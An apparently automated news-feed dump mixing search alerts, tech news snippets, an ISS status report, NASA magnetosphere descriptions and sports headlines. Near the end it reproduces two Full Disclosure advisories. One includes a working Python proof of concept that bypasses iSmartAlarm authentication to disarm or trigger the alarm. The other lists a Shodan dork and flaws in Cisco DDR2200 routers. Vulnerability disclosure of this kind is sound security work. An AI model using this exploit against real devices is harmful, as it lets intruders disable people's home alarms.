I want to restrict anonymous links to specified do...

We have disabled anonymous sharing in our SharePoint Online tenant. However, we would like to allow anonymous sharing in specific domains to ...

from Google Alert - anonymous http://ift.tt/2tVSA7n
via IFTTT

Porcelain Blues

anonymous. Drag Edit. Add description; Set as cover ... Tegeltableau afkomstig uit het… anonymous ... Bak met geplooide rand, in het… anonymous.

from Google Alert - anonymous http://ift.tt/2trvBgB
via IFTTT

I have a new follower on Twitter

Pro Wrestling Chaos
Bristol. 3 mates put on a show hoping that enough folks would turn up, that was in June 2013.... Tickets/info: https://t.co/TAlkHZAkNJ Call: 07957198511
Bristol, UK
https://t.co/QjrMcLHT4I
Following: 11627 - Followers: 14913

July 15, 2017 at 10:37AM via Twitter http://twitter.com/chaos_wrestling

Two New Platforms Found Offering Cybercrime-as-a-Service to 'Wannabe Hackers'

Cybercrime has continued to evolve and today exists in a highly organised form. Cybercrime has increasingly been commercialised, and itself become big business by renting out an expanded range of hacking tools and technologies, from exploit kits to ransomware, to help anyone build threats and launch attacks. In past few years, we have witnessed the increase in the popularity of

from The Hacker News http://ift.tt/2t1EgqV
via IFTTT

Alcoholics Anonymous (AA) Meetings // Events // Rev. James E. McDonald, CSC, Center for ...

Alcoholics Anonymous (AA) Meetings. Time: Fri Jul 14, 2017, 12:00PM - 1:00PM. Location: 215, The Living Room. Alcoholics Anonymous (AA) ...

from Google Alert - anonymous http://ift.tt/2t0QOP4
via IFTTT

network-anonymous-tor

network-anonymous-tor. Haskell API for Tor anonymous networking http://ift.tt/1VFyANi;...

from Google Alert - anonymous http://ift.tt/2tUWb3D
via IFTTT

Commercial PV Designer III

Commercial PV Designer III in with Anonymous. Apply Today.

from Google Alert - anonymous http://ift.tt/2tVkDlt
via IFTTT

ISS Daily Summary Report – 7/13/2017

Window Observational Research Facility (WORF): The crew installed the WORF Improved Payload Ethernet Hub Gateway (iPEHG) and WORF Shutter Actuator System (SAS) in the WORF Rack. This hardware will allow ground commanded control of the US Lab Window Shutter in support of payload operations and the new iPEHG design corrects performance limitations experienced by the older PEHG. The WORF provides a facility for Earth science remote sensing instruments. It uses the US Laboratory science window that has the highest quality optics ever flown on a human-occupied spacecraft.  Space Automated Bioproduct Lab (SABL):  The crew installed a controller for the SABL CO2 Incubator. The SABL supports a wide variety of experiments in the life, physical and material sciences with a focus on supporting research of biological systems and processes. It has a temperature controlled volume with LED lighting for scientific hardware and experiments. It can be fitted to provide 5% CO2 for cell cultures. NeuroMapping: A USOS crewmember set up the Neuromapping hardware and performed tests in “strapped in” and “free floating” body configurations. During the test, the crewmember executed three Behavioral Assessments: mental rotation, sensorimotor adaptation, and motor-cognitive dual tasking. The NeuroMapping investigation studies whether long-duration spaceflight causes changes to brain structure and function, motor control, or multi-tasking abilities. It also measures how long it would take for the brain and body to recover from possible changes. Previous research and anecdotal evidence from astronauts suggests movement control and cognition can be affected in microgravity. The NeuroMapping investigation performs structural and functional magnetic resonance brain imaging (MRI and fMRI) to assess any changes that occur after spending months on the ISS. High Efficiency Particulate Air (HEPA) Filter Inspections: The crew audited the HEPA filters on June 16 and found that 8 of the 10 filters did not have required packaging. Engineering requested that the crew inspect the filters for seal debonding, seal deformation, and/or cuts/gouges that extend through the depth of the sealing surface and to verify that the cap is properly affixed to the housing. These filters were inspected by the crew today and Foreign Object Debris (FOD) was identified on the seals of some of the filters. Cleaning of the affected filters will be scheduled followed by wrapping of the filters in approved packaging for storage.  Today’s Planned Activities All activities were completed unless otherwise noted. Reminder 1 Fluid Shifts Baseline Imaging Measures Combustion Integrated Rack Alignment Guide Install Long Duration Sorbent Testbed Status Check. Countermeasures System (CMS) Heart Rate Monitor (HRM) iPad Downlink Meteor Partial Removal JEMRMS Backup Drive System (BDS) Reconfiguration WORF PEHG Shutter Actuator System Installation Removal of 2 Navigation Modules from Progress 436 [AO] ROBoT Software Startup Environmental Health System (EHS) Acoustic Dosimeters – Data Transfer and Stow JEMRMS Backup Controller (BUC) Power On for BDS C/O Download Pille Dosimeter Readings Progress 435 (DC1) Stowage and IMS Ops JEMRMS Backup Drive System (BDS) Checkout 2 Fluid Shifts CCFP Baseline Setup JEMRMS Back Up Controller (BUC) Power Off for BDS C/O JEMRMS Backup Drive System (BDS) Checkout cleanup Replacement of 800А unit from position А105, ПТАБ-2 installation, Preparation (locating devices, documentation review) WORF Shutter Actuator System Installation Assist Fluid Shifts Hardware Battery Installation Measuring CO partial pressure at Central Post using CSA-CP analyzer Midday Meal WORF PEHG Shutter Actuator System Installation EXPRESS Rack 4 Locker Removal TangoLab Hardware Move Space Automated Bioproduct Lab, CO2 Incubator Installation Cleaning FGB Gas-Liquid Heat Exchanger (ГЖТ) Detachable Screens 1, 2, 3 In-flight Maintenance (IFM) Bacteria Filter Inspection Meteor Partial Installation Water Recovery System Waste Water Tank Drain Init Multi-purpose Small Payload Rack (MSPR) Video compression and Recording Unit (VRU) Activation Water Recovery System Waste Water Tank Drain Termination WORF Window Shutter Actuator System Calibration Completed Task List Items NeuroMapping Experiment Neurocognitive Test  Ground Activities All activities were completed unless otherwise noted. WORF PEHG Shutter Actuator System Installation Support Three-Day Look Ahead: Friday, 07/14: Fluid Shifts, JEM Small Satellite Orbital Deplorer (SSOD) Removal, Optical Coherence Tomography Saturday, 07/15: Housecleaning, Crew Off-Day. Sunday, 07/16: Crew Off-Day. QUICK ISS Status – Environmental Control Group:   Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On           [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Full up Trace Contaminant Control System (TCCS) Node 3 Off

from ISS On-Orbit Status Report http://ift.tt/2us9rQq
via IFTTT

Awesome! WhatsApp Now Lets You Send Files of Any Format

Have you ever felt like wishing of sending any type of file immediately to your friends and office colleagues on WhatsApp directly, instead of just contacts, images or documents? Well, now you can… The latest version of WhatsApp for Android and iOS now allows users to send and receive any type of files, whether it’s .mp3, .avi, .php, zip files, or even APKs. <!-- adsense --> The company last

from The Hacker News http://ift.tt/2uid0Z9
via IFTTT

Ravens: Brian Billick named to preseason broadcast team; next step should be Ring of Honor - Jamison Hensley (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Earth's Magnetosphere

Earth's magnetic field creates a 'bubble' around Earth that helps protect our planet from some of the more harmful effects of energetic particles streaming out from the sun in the solar wind. Some of the earliest hints of this interaction go back to the 1850s with the work of Richard Carrington, and in the early 1900s with the work of Kristian Birkeland and Carl Stormer. That this field might form a type of 'bubble' around Earth was hypothesized by Sidney Chapman and Vincent Ferraro in the 1930s. The term 'magnetosphere' was applied to magnetic bubble by Thomas Gold in 1959. But it wasn't until the Space Age, when we sent the first probes to other planets, that we found clear evidence of their magnetic fields (though there were hints of a magnetic field for Jupiter in the 1950s, due to observations from radio telescopes). The Voyager program , two spacecraft launched in 1977, and successors to the Pioneer 10 and 11 missions , completed flybys of the giant outer planets. They became the implementation of the 'Grand Tour' of the outer planets originally proposed in the late 1960s. The Voyagers provided some of the first detailed measurments of the strength, extent and diversity of the magnetospheres of the outer planets. In these visualizations, we present simplified models of these planetary magnetospheres, designed to illustrate their scale, and basic features of their structure and impacts of the magnetic axes offset from the planetary rotation axes. For this Earth visualization, note that the north magnetic pole points out of the southern hemisphere. For these visualizations, the magnetic field structure is represented by gold/copper lines. Some additional glyphs are provided to indicate some key directions in the field model. The Yellow arrow points towards the sun. The magnetotail is pointed in the opposite direction. The Cyan arrow represents the magnetic axis, usually tilted relative to the rotation axis. The arrow indicates the NORTH magnetic pole (convention has field lines moving north to south as the north pole of bar magnet (and compass pointer) points to the south magnetic pole). The Blue arrow represents the north rotation axis. It is part of the 3-D axis glyph (red, green, and blue arrows) included to make the planetary rotation more apparent. The semi-transparent grey mesh in the distance represents the boundary of the magnetosphere. Major satellites of the planetary system are also included. When appropriate for the time window of the visualization, the Voyager flyby trajectories are indicated. The models are constructed by combining the fields of a simple magnetic dipole, a current sheet (whose intensity is tuned match the scale of the magnetotail), and occasionally a ring current. This is a variation of the simple Luhmann-Friesen magnetosphere model. They are meant to be representative of the basic characteristics of the planetary magnetic fields. Some features NOT included are longitudes of magnetic poles to a standard planetary coordinate system and offsets of the dipole center from the planetary center. References T. Gold, Motions in the Magnetosphere of the Earth Luhmann and Friesen, A simple model of the magnetosphere LASP: Polarity of planetary magnetic fields Wikipedia: The Solar Storm of 1859 Wikipedia: Kristian Birkeland Wikipedia: Carl Stormer Special thanks to Arik Posner (NASA/HQ) and Gina DiBraccio (UMBC/GSFC) for helpful pointers on orientation of planetary rotation and magnetic axes.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2vkGEK5
via IFTTT

Jupiter's Magnetosphere

Earth's magnetic field creates a 'bubble' around Earth that helps protect our planet from some of the more harmful effects of energetic particles streaming out from the sun in the solar wind. Some of the earliest hints of this interaction go back to the 1850s with the work of Richard Carrington, and in the early 1900s with the work of Kristian Birkeland and Carl Stormer. That this field might form a type of 'bubble' around Earth was hypothesized by Sidney Chapman and Vincent Ferraro in the 1930s. The term 'magnetosphere' was applied to magnetic bubble by Thomas Gold in 1959. But it wasn't until the Space Age, when we sent the first probes to other planets, that we found clear evidence of their magnetic fields (though there were hints of a magnetic field for Jupiter in the 1950s, due to observations from radio telescopes). The Voyager program , two spacecraft launched in 1977, and successors to the Pioneer 10 and 11 missions , completed flybys of the giant outer planets. They became the implementation of the 'Grand Tour' of the outer planets originally proposed in the late 1960s. The Voyagers provided some of the first detailed measurments of the strength, extent and diversity of the magnetospheres of the outer planets. In these visualizations, we present simplified models of these planetary magnetospheres, designed to illustrate their scale, and basic features of their structure and impacts of the magnetic axes offset from the planetary rotation axes. The volcanic activity on Jupiter's moon Io launches a large amount of sulfur-based compounds along its orbit, which is subsequently ionized by solar ultraviolet radiation. This is represented in the visualization by the yellowish structure along the orbit of Io. This creates a plasma torus and ring current around Jupiter, which alters the planet's magnetic field, forming some of the perturbations in Jupiter's magnetic field along the orbit of Io. For these visualizations, the magnetic field structure is represented by gold/copper lines. Some additional glyphs are provided to indicate some key directions in the field model. The Yellow arrow points towards the sun. The magnetotail is pointed in the opposite direction. The Cyan arrow represents the magnetic axis, usually tilted relative to the rotation axis. The arrow indicates the NORTH magnetic pole (convention has field lines moving north to south as the north pole of bar magnet (and compass pointer) points to the south magnetic pole). The Blue arrow represents the north rotation axis. It is part of the 3-D axis glyph (red, green, and blue arrows) included to make the planetary rotation more apparent. The semi-transparent grey mesh in the distance represents the boundary of the magnetosphere. Major satellites of the planetary system are also included. When appropriate for the time window of the visualization, the Voyager flyby trajectories are indicated. The models are constructed by combining the fields of a simple magnetic dipole, a current sheet (whose intensity is tuned match the scale of the magnetotail), and occasionally a ring current. This is a variation of the simple Luhmann-Friesen magnetosphere model. They are meant to be representative of the basic characteristics of the planetary magnetic fields. Some features NOT included are longitudes of magnetic poles to a standard planetary coordinate system and offsets of the dipole center from the planetary center. References T. Gold, Motions in the Magnetosphere of the Earth Luhmann and Friesen, A simple model of the magnetosphere LASP: Polarity of planetary magnetic fields Wikipedia: The Solar Storm of 1859 Wikipedia: Kristian Birkeland Wikipedia: Carl Stormer Special thanks to Arik Posner (NASA/HQ) and Gina DiBraccio (UMBC/GSFC) for helpful pointers on orientation of planetary rotation and magnetic axes.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2umAoUI
via IFTTT

Saturn's Magnetosphere

Earth's magnetic field creates a 'bubble' around Earth that helps protect our planet from some of the more harmful effects of energetic particles streaming out from the sun in the solar wind. Some of the earliest hints of this interaction go back to the 1850s with the work of Richard Carrington, and in the early 1900s with the work of Kristian Birkeland and Carl Stormer. That this field might form a type of 'bubble' around Earth was hypothesized by Sidney Chapman and Vincent Ferraro in the 1930s. The term 'magnetosphere' was applied to magnetic bubble by Thomas Gold in 1959. But it wasn't until the Space Age, when we sent the first probes to other planets, that we found clear evidence of their magnetic fields (though there were hints of a magnetic field for Jupiter in the 1950s, due to observations from radio telescopes). The Voyager program , two spacecraft launched in 1977, and successors to the Pioneer 10 and 11 missions , completed flybys of the giant outer planets. They became the implementation of the 'Grand Tour' of the outer planets originally proposed in the late 1960s. The Voyagers provided some of the first detailed measurments of the strength, extent and diversity of the magnetospheres of the outer planets. In these visualizations, we present simplified models of these planetary magnetospheres, designed to illustrate their scale, and basic features of their structure and impacts of the magnetic axes offset from the planetary rotation axes. For these visualizations, the magnetic field structure is represented by gold/copper lines. Some additional glyphs are provided to indicate some key directions in the field model. The Yellow arrow points towards the sun. The magnetotail is pointed in the opposite direction. The Cyan arrow represents the magnetic axis, usually tilted relative to the rotation axis. The arrow indicates the NORTH magnetic pole (convention has field lines moving north to south as the north pole of bar magnet (and compass pointer) points to the south magnetic pole). The Blue arrow represents the north rotation axis. It is part of the 3-D axis glyph (red, green, and blue arrows) included to make the planetary rotation more apparent. The semi-transparent grey mesh in the distance represents the boundary of the magnetosphere. Major satellites of the planetary system are also included. When appropriate for the time window of the visualization, the Voyager flyby trajectories are indicated. The models are constructed by combining the fields of a simple magnetic dipole, a current sheet (whose intensity is tuned match the scale of the magnetotail), and occasionally a ring current. This is a variation of the simple Luhmann-Friesen magnetosphere model. They are meant to be representative of the basic characteristics of the planetary magnetic fields. Some features NOT included are longitudes of magnetic poles to a standard planetary coordinate system and offsets of the dipole center from the planetary center. References T. Gold, Motions in the Magnetosphere of the Earth Luhmann and Friesen, A simple model of the magnetosphere LASP: Polarity of planetary magnetic fields Wikipedia: The Solar Storm of 1859 Wikipedia: Kristian Birkeland Wikipedia: Carl Stormer Special thanks to Arik Posner (NASA/HQ) and Gina DiBraccio (UMBC/GSFC) for helpful pointers on orientation of planetary rotation and magnetic axes.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2vkCJwU
via IFTTT

Uranus' Magnetosphere

Earth's magnetic field creates a 'bubble' around Earth that helps protect our planet from some of the more harmful effects of energetic particles streaming out from the sun in the solar wind. Some of the earliest hints of this interaction go back to the 1850s with the work of Richard Carrington, and in the early 1900s with the work of Kristian Birkeland and Carl Stormer. That this field might form a type of 'bubble' around Earth was hypothesized by Sidney Chapman and Vincent Ferraro in the 1930s. The term 'magnetosphere' was applied to magnetic bubble by Thomas Gold in 1959. But it wasn't until the Space Age, when we sent the first probes to other planets, that we found clear evidence of their magnetic fields (though there were hints of a magnetic field for Jupiter in the 1950s, due to observations from radio telescopes). The Voyager program , two spacecraft launched in 1977, and successors to the Pioneer 10 and 11 missions , completed flybys of the giant outer planets. They became the implementation of the 'Grand Tour' of the outer planets originally proposed in the late 1960s. The Voyagers provided some of the first detailed measurments of the strength, extent and diversity of the magnetospheres of the outer planets. In these visualizations, we present simplified models of these planetary magnetospheres, designed to illustrate their scale, and basic features of their structure and impacts of the magnetic axes offset from the planetary rotation axes. The rotation axis of Uranus is tilted over ninety degrees relative to the revolution axis of the solar system, placing it roughly in the plane of the solar system. In addition, the magnetic axis has a large tilt relative to the rotation axis. These effects combine to not only give Uranus a more a more variable magnetosphere, but suggest the planet's magnetic field may be generated by a different mechanism than that of Earth, Jupiter and Saturn. For these visualizations, the magnetic field structure is represented by gold/copper lines. Some additional glyphs are provided to indicate some key directions in the field model. The Yellow arrow points towards the sun. The magnetotail is pointed in the opposite direction. The Cyan arrow represents the magnetic axis, usually tilted relative to the rotation axis. The arrow indicates the NORTH magnetic pole (convention has field lines moving north to south as the north pole of bar magnet (and compass pointer) points to the south magnetic pole). The Blue arrow represents the north rotation axis. It is part of the 3-D axis glyph (red, green, and blue arrows) included to make the planetary rotation more apparent. The semi-transparent grey mesh in the distance represents the boundary of the magnetosphere. Major satellites of the planetary system are also included. When appropriate for the time window of the visualization, the Voyager flyby trajectories are indicated. The models are constructed by combining the fields of a simple magnetic dipole, a current sheet (whose intensity is tuned match the scale of the magnetotail), and occasionally a ring current. This is a variation of the simple Luhmann-Friesen magnetosphere model. They are meant to be representative of the basic characteristics of the planetary magnetic fields. Some features NOT included are longitudes of magnetic poles to a standard planetary coordinate system and offsets of the dipole center from the planetary center. References T. Gold, Motions in the Magnetosphere of the Earth Luhmann and Friesen, A simple model of the magnetosphere Magnetic reconnection at Uranus' magnetopause LASP: Polarity of planetary magnetic fields Wikipedia: The Solar Storm of 1859 Wikipedia: Kristian Birkeland Wikipedia: Carl Stormer Special thanks to Arik Posner (NASA/HQ) and Gina DiBraccio (UMBC/GSFC) for helpful pointers on orientation of planetary rotation and magnetic axes.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2umwJGF
via IFTTT

Neptune's Magnetosphere

Earth's magnetic field creates a 'bubble' around Earth that helps protect our planet from some of the more harmful effects of energetic particles streaming out from the sun in the solar wind. Some of the earliest hints of this interaction go back to the 1850s with the work of Richard Carrington, and in the early 1900s with the work of Kristian Birkeland and Carl Stormer. That this field might form a type of 'bubble' around Earth was hypothesized by Sidney Chapman and Vincent Ferraro in the 1930s. The term 'magnetosphere' was applied to magnetic bubble by Thomas Gold in 1959. But it wasn't until the Space Age, when we sent the first probes to other planets, that we found clear evidence of their magnetic fields (though there were hints of a magnetic field for Jupiter in the 1950s, due to observations from radio telescopes). The Voyager program , two spacecraft launched in 1977, and successors to the Pioneer 10 and 11 missions , completed flybys of the giant outer planets. They became the implementation of the 'Grand Tour' of the outer planets originally proposed in the late 1960s. The Voyagers provided some of the first detailed measurments of the strength, extent and diversity of the magnetospheres of the outer planets. In these visualizations, we present simplified models of these planetary magnetospheres, designed to illustrate their scale, and basic features of their structure and impacts of the magnetic axes offset from the planetary rotation axes. The rotation axis of Neptune is highly tilted relative to the revolution axis of the solar system, but nowhere near as extreme as Uranus. It's magnetic axis also has a large tilt relative to the rotation axis. These effects combine to not only give Uranus a more a more variable magnetosphere, but suggest the planet's magnetic field may be generated by a different mechanism than that of Earth, Jupiter and Saturn. For these visualizations, the magnetic field structure is represented by gold/copper lines. Some additional glyphs are provided to indicate some key directions in the field model. The Yellow arrow points towards the sun. The magnetotail is pointed in the opposite direction. The Cyan arrow represents the magnetic axis, usually tilted relative to the rotation axis. The arrow indicates the NORTH magnetic pole (convention has field lines moving north to south as the north pole of bar magnet (and compass pointer) points to the south magnetic pole). The Blue arrow represents the north rotation axis. It is part of the 3-D axis glyph (red, green, and blue arrows) included to make the planetary rotation more apparent. The semi-transparent grey mesh in the distance represents the boundary of the magnetosphere. Major satellites of the planetary system are also included. When appropriate for the time window of the visualization, the Voyager flyby trajectories are indicated. The models are constructed by combining the fields of a simple magnetic dipole, a current sheet (whose intensity is tuned match the scale of the magnetotail), and occasionally a ring current. This is a variation of the simple Luhmann-Friesen magnetosphere model. They are meant to be representative of the basic characteristics of the planetary magnetic fields. Some features NOT included are longitudes of magnetic poles to a standard planetary coordinate system and offsets of the dipole center from the planetary center. References T. Gold, Motions in the Magnetosphere of the Earth Luhmann and Friesen, A simple model of the magnetosphere Magnetic reconnection at Neptune's magnetopause LASP: Polarity of planetary magnetic fields Wikipedia: The Solar Storm of 1859 Wikipedia: Kristian Birkeland Wikipedia: Carl Stormer Special thanks to Arik Posner (NASA/HQ) and Gina DiBraccio (UMBC/GSFC) for helpful pointers on orientation of planetary rotation and magnetic axes.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2vkyGR5
via IFTTT

Orioles 1B Chris Davis (oblique) expected to return from DL Friday vs. Cubs (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

AlphaBay Shut Down After Police Raid; Alleged Founder Commits Suicide in Jail

AlphaBay Market — one of the largest Dark Web marketplaces for drugs, guns, and other illegal goods — that mysteriously went dark earlier this month without any explanation from its admins has reportedly been shut down by the international authorities. On July 4th, the dark web marketplace suddenly went down without any explanation from its admins, which left its customers who have paid large

from The Hacker News http://ift.tt/2tm7xvN
via IFTTT

Ubuntu Linux for Windows 10 Released — Yes, You Read it Right

Windows and Linux in the same line? Yes, you heard that right... and that too, on the same computer and within the same operating system. Two months ago, Microsoft announced its plans to let its users install three different flavours of the Linux operating system – Ubuntu, Fedora, and SUSE – directly through their Windows Store, allowing them to run Windows and Linux apps side-by-side. Now,

from The Hacker News http://ift.tt/2sWFe7I
via IFTTT

[FD] [CVE-2017-7728] - Authentication Bypass allows alarm's commands execution in iSmartAlarm

[+] Credits: Ilia Shnaidman [+] @0x496c on Twitter [+] Source: http://ift.tt/2tK6Lw4 Vendor: ============= iSmartAlarm, inc. Product: =========================== iSmartAlarm cube - All iSmartAlarm is one of the leading IoT manufactures in the domain of smart alarm systems. It provides a fully integrated alarm system with siren, smart cameras and locks. It functions like any alarm system, but with the benefits of a connected device: alerts pop up on your phone, offering you full remote control via mobile app wherever you are. Vulnerability Type: ====================== Authentication Bypass CVE Reference: ============= CVE-2017-7728 Security Issue: ================ On iSmartAlarm cube devices, there is an authentication bypass. The vulnerability can lead to remote execution of alarm's commands; setting the alarm on/off and activating the alarm siren. Additional Information: =============== 1. First the app and the cube authenticate by using sophisticated 4 way handshake. Looks like that: App ISAT\x01\x00*3\x01\x00*7 Cube ISAT\x02\x00*3\x01\x00*3\x10\x00*3 + "Cube generated Secret Key" 2. Encryption algorithm: With the "Secret key" and the IPU (encryption key) the app decrypts a key using XXTEA encryption algorithm (funny thing is that ismartalarm implementation is broken). After that, the algorithm takes the output of the XXTEA enc and then reverses the output. This is the "new key"! So now, we got the encryption key, and we can do whatever we want with the alarm. 3. The app sends command as follows to proceed with the authentication: App ISAT\x03\x00*3\x01\x00*3\x10\x00*3 + "new key" Cube ISAT\x04\x00*3\x01\x00*3\x01\x00*3\x01 4. NOW WE ARE AUTHENTICATED. we can now send one of the following commands to the cube Disarming the alarm "Disarm mode": ISATP\x00*3\x01\x00*3\x03\x00*3\x01\x002 Arming the alarm "Arm mode": ISATP\x00*3\x01\x00*3\x03\x00*3\x01\x000 Activate alarm's siren "Panic mode": ISATP\x00*3\x01\x00*3\x03\x00*3\x01\x003 Attack Vectors: =============== After authentication, using the above protocol will allow full control of the alarm. When iSmartAlarm's mobile app connected to the same network as the iSmartAlarm's cube, their authentication and then communication are made on port tcp/12345 in PLAIN TEXT. Obtaining encryption key is done by using CVE-2017-7726. After setting the MITM a POST request is made to the following api: http://ift.tt/2uYgiOy From there an attacker can obtain the encryption key. After obtaining the encryption key, using the above protocol will allow an attacker a full control over the alarm system. PoC: =============== #!/usr/bin/python # auther: Ilia Shnaidman # @0x496c on Twitter # python27 import socket import struct # - - - - - - - ISMART_SYN = 'ISAT\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' ISMART_SYN_ACK = 'ISAT\x02\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00' ISMART_ACK_PREFIX = 'ISAT\x03\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00' ISMART_SUCCESS_ACK = 'ISAT\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01' ISMART_ALARM_DISARM = 'ISATP\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x002' ISMART_ALARM_DISARM_ACK = 'ISATQ\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00200' ISMART_ALARM_ARM = 'ISATP\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x000' ISMART_ALARM_ARM_ACK = 'ISATQ\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00000' ISMART_ALARM_PANIC = 'ISATP\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x003' ISMART_ALARM_PANIC_ACK = 'ISATQ\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00300' DELTA = 0x9e3779b9 IP = '1.2.3.4' ISMART_PORT = 12345 # retrieve ismartalarm key using CVE-2017-7726, # and search for /GetIpu.ashx api ISMART_KEY = "" MTU = 1450 # - - - - - - - def decrypt_in_place(data,key): #data_out = [0,0,0,0] key_u = struct.unpack('>IIII', key) data_u = struct.unpack('>IIII', data) data_u = [i for i in data_u] if len(key_u) != 4: return None if len(data_u) != 4: return None y = data_u[0] sum = (6 + (52/4)) * DELTA l = 4 for i in xrange(19): e = (sum >> 2) & 3 for p in xrange(3,0,-1): z = data_u[p-1] y = (data_u[p] - ((((z>>5^(y<<2&0xffffffff)) + (y>>3^(z<<4&0xffffffff))) ^ (((sum^y)&0xffffffff) + (key_u[(p&3)^e]^z)))&0xffffffff))&0xffffffff data_u[p] = y z = data_u[l-1] y = (data_u[0] - ((((z>>5^(y<<2&0xffffffff)) + (y>>3^(z<<4&0xffffffff))) ^ (((sum^y)&0xffffffff) + (key_u[(0&3)^e]^z)))&0xffffffff))&0xffffffff data_u[0] = y sum = sum - DELTA return data_u def revarr(arr): n_arr = [0]*16 for i in xrange(4): n_arr[i] = arr[3-i] n_arr[i+4] = arr[7-i] n_arr[i+8] = arr[11-i] n_arr[i+12] = arr[15-i] return "".join(n_arr) def ismartalarm_connection(): ismart_so = socket.socket() ismart_so.settimeout(5) ismart_so.connect((IP, ISMART_PORT)) ismart_so.send(ISMART_SYN) so_recv = ismart_so.recv(MTU) if ISMART_SYN_ACK == so_recv[:16]: ismart_secret = so_recv[16:] key = ISMART_KEY data_dec = decrypt_in_place(revarr(ismart_secret), revarr(key)) data_dec_rev = revarr("".join(["{0:0{1}x}".format(i,8) for i in data_dec]).decode("hex")) ismart_so.send("%s%s" % (ISMART_ACK_PREFIX, data_dec_rev)) so_recv = self.ismart_so.recv(MTU) if ISMART_SUCCESS_ACK == so_recv: # We are authenticated return ismart_so return False def ismart_commands(command): # Get authenticated connection to ismartalarm ismart_so = ismartalarm_connection() if not ismart_so: # we failed to authenticate return False if not command: return False if "arm" is command: print "[+] Sending arm command" ismart_so.send(ISMART_ALARM_ARM) so_recv = ismart_so.recv(MTU) if ISMART_ALARM_ARM_ACK == so_recv: print "[!] Success! iSmart Alarm system is ARMED!" elif "disarm" is command: print "[+] Sending disarm command" ismart_so.send(ISMART_ALARM_DISARM) so_recv = ismart_so.recv(MTU) if ISMART_ALARM_DISARM_ACK == so_recv: print "[!] Success! iSmartAlarm system is disarmed!" elif "panic" is command: print "[+] Sending panic command, close your ears :)" ismart_so.send(ISMART_ALARM_PANIC) so_recv = ismart_so.recv(MTU) if ISMART_ALARM_PANIC_ACK == so_recv: print "[!] Success! iSmartAlarm system is in panic mode!" return True Network Access: =============== Remote Severity: ========= High Disclosure Timeline: ===================================== Jan 30, 2017: Initial contact to vendor Feb 1, 2017: Vendor replied, requesting details Feb 2, 2017: Disclosure to vendor Apr 12, 2017: After vendor didn't replied, I've approached CERT Apr 13, 2017: Confirmed receipt by CERT and assigning CVEs July 05, 2017: Public disclosure

Source: Gmail -> IFTTT-> Blogger

[FD] CVE request: Multiple vulnerabilities in Cisco DDR2200 Series

*Copyright and Disclaimer* The information in this advisory is Copyright 2017 Conviso and provided so that the society can understand the risk they may be facing by running affected software, hardware or other components used on their systems. In case you wish to copy information from this advisory, you must either copy all of it or refer to this document (including our URL). No guarantee is provided for the accuracy of this information, or damage you may cause your systems in testing. *About Conviso* Conviso is a consulting company specialized on application security. Our values are based on the allocation of the adequate competencies on the field, a clear and direct speech with the market, collaboration and partnership with our customers and business partners and constant investments on methodology and research improvement. This advisory has been discovered as part of a general investigation into the security of software used in the IT environments of our customers. For more information about our company and services provided, please check our website at www.conviso.com.br. *The Security Research* Conviso maintains a virtual team dedicated to explore our customer’s environments in order to identify technical vulnerabilities in software and hardware, developing real-world mitigation solutions and processes to maintain more secure environments. This team is named Conviso Labs and also contribute to important world-class projects and organizations. The vulnerability described in this security advisory was discovered by Matheus Bernardes on July 15th 2017 during an internal security research. *Security Advisory* The page used to download the configuration file is vulnerable to path traversal, that allows an attacker to download any system file. *Issue Description* Some of Cisco DDR2200 router series, show some vulnerabilities as, authentication bypass, Remote code execution and path traversal As a result, an attacker can gain access to the router configuration, access to internal files and a limited command execution. *Shodan Dork* http.title:"Cisco DDR2201v1 ADSL2+ Residential Gateway" http.title:"Cisco DDR2200 ADSL2+ Residential Gateway" *Affected Components* *Device*: Cisco DDR2201v1 ADSL2+ Residential Gateway *Software Version*: DDR2201v1-NA-AnnexA-FCC-V00.00.03.28.3 Path Traversal    Bypass Authentication Remote code execution (RCE) *Device*: Cisco DDR2200 ADSL2+ Residential Gateway *Software Version*: DDR2200B-NA-AnnexA-FCC-V00.00.03.45.4E Remote code execution (RCE) Path Traversal    *Vulnerabilities details* Bypass Authentication Some pages don’t need the user to be authenticated to gain access http://ift.tt/2upIcWP http://ift.tt/2uYuuXY http://ift.tt/2upDuse http://ift.tt/2uYJ2H2 http://ift.tt/2upZEdD http://ift.tt/2uYgehK http://ift.tt/2upyNyj http://ift.tt/2uYqJSs http://ift.tt/2upIywF http://ift.tt/2uYJ41C http://ift.tt/2upzVCa http://ift.tt/2uY74C3 http://ift.tt/2upoD0L http://ift.tt/2uYKGbx http://ift.tt/2upKHrW http://ift.tt/2uXZGqn http://ift.tt/2upBMGZ http://ift.tt/2uYxhjF http://ift.tt/2upMmOq http://ift.tt/2uYiYeY http://ift.tt/2upF5hu http://ift.tt/2uY5sbn http://ift.tt/2upkwBK http://ift.tt/2uYuveu http://ift.tt/2upKOnC http://ift.tt/2uYJ2Xy http://ift.tt/2upzWGe http://ift.tt/2uYlrpP http://ift.tt/2upDuIK *Path Traversal* The page used to download the configuration file, is vulnerable to path traversal, that allow an attacker to download any system file. http://ift.tt/2uYgeyg *Remote code execution (RCE)* *Description* The ping function allows arbitrary 